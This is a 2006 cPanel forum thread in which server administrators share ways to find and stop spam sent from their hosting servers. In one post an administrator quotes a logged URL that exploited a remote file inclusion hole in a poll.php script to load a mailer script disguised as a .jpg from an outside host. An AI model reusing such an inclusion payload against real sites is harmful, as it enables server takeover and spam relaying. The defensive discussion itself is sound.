The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Stopping spam being sent from server - without disabling email 100%...

Discussion in 'E-mail Discussions' started by harveycarpenter, Mar 9, 2006.

  1. harveycarpenter

    Joined:
    Jul 20, 2005
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    Is there a way to stop spammers sending out thousands of emails from your server?

    I've tried both reducing the number of emails a domain can send out to 20, and disabling mailing lists, but I just picked out an email ready to be sent 10,000 from my mail queue!

    The message originated from cPanel, it said - looked like it had been sent from Horde or Neomail etc.

    Thanks
     
  2. mohit

    mohit Well-Known Member

    Joined:
    Jul 12, 2005
    Messages:
    553
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Sticky On Internet
    hi,
    have you disabled nobody user yet, if not do it.
    most probably a PHP script must have been used to sent out spam.

    check whats the source of those mails, look into headers, find the user a/c. and suspend.

    you may Also check mail statistics to find out the account used it might have some clues i hope.

    also looking into exim_mainlog would help you in tracing the user.

    you can also look for spam issues on this forum as its quite often discussed in past.

    see ya,
    mohit
     
  3. djblamire

    djblamire Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    16
    I'm trying to trace back spam that originated from my server. (Sent through nobody - probably by a PHP script).

    I cannot find any logs that will show me the account name it originated from.

    I no longer have access to cpanel/whm, and can only access the old files on the hard drive directly.

    I have taken a look at exim_mainlog and tried to find the apache http log, but not had any luck.

    Any ideas where I can start? - I'm trying to stop this happening again,

    Thanks
    Daniel
     
  4. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    This is a frequently asked question, and as such you'll find lots of stuff in the cpanel forums about how to deal with it.

    How I (personally) prevent spam from being sent out:

    1. Install mod_security and configure it to stop Bcc:/Cc: injection attacks (search here or WHT for details)

    2. Set max emails per hour to 150, can tweak individual domains wanting more in /var/cpanel/maxemails (search for details).

    3. Rebuild apache to run with phpsuexec/suexec. (search these forums for details; don't forget you need to make sure your user script permissions are correct after converting)

    4. Keep installed scripts (especially phpBB) up to date. Use mod_security rules to prevent known script attacks first, then go through and update old scripts.

    5. Go to spamcop.com and sign up for server alerts so you can see if anyone tries to spam from your server (this allows you to become aware of it early, rather than late).

    Follow all these points and you'll rarely, if ever, have a problem with outgoing spam.

    If spam is actually being sent, you can enable some exim logging detail so that you can track down the exact script. This makes your logs huge so don't run with it unless you are getting spam.

    Some other non-technical ways to try to discourage spammers from signing up with you:
    - don't offer immediate activation of accounts - always check manually and verify suspicious orders
    - don't try to compete in the lower end of the market - someone will always be cheaper than you, and then they'll disappear 12 months later when they go broke!
    - make your stance against spam clear in your TOS and site documentation

    Here are some relevant URLs and posts:

    cpanel forums post: "spam protection guide"
    - notes on protection from both incoming and outgoing spam

    If you've not done all this before, save yourself some grief and hire one of the experts. I use and recommend configserver.com - they're professional and expert, may be hard to get on their books as they're in demand. Others are good too; you want to purchase a "security package" which should include security hardening as well as spam protection.
     
    #4 brianoz, Jun 2, 2006
    Last edited: Jun 2, 2006
  5. tweakservers

    tweakservers Well-Known Member

    Joined:
    Mar 30, 2006
    Messages:
    379
    Likes Received:
    0
    Trophy Points:
    16
    Check on your /usr/local/cpanel/logs/access_log as if mails sent from the webmail, there will be entries of which users login to the webmail at that time. Check through the log and find out which users are having the most entries in the logs
     
  6. djblamire

    djblamire Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    16
    Thank you very much for the information - That will certainly give me plenty to look at to try and make my server more secure.

    I have tracked down the script using the apache logs. It seemed to come through via the following method:

    Code:
    http://www.mywebsite.com/news/extras/poll/poll.php?file_newsportal=http://www.geocities.com/lud_na_kon/phpmailerr.jpg
    The phpmailerr.jpg file isn't actually an image, but a script file.

    I will of course not use this 'poll.php' script again, but is there a quick way to stop people being able to run files such as that from the URL ??

    Thanks again for your assistance,

    Daniel
     
  7. konrath

    konrath Well-Known Member

    Joined:
    May 3, 2005
    Messages:
    367
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brasil
    :D You can fix this problem.

    http://forums.cpanel.net/showthread.php?t=50186&highlight=extended+logging






     
Loading...

Share This Page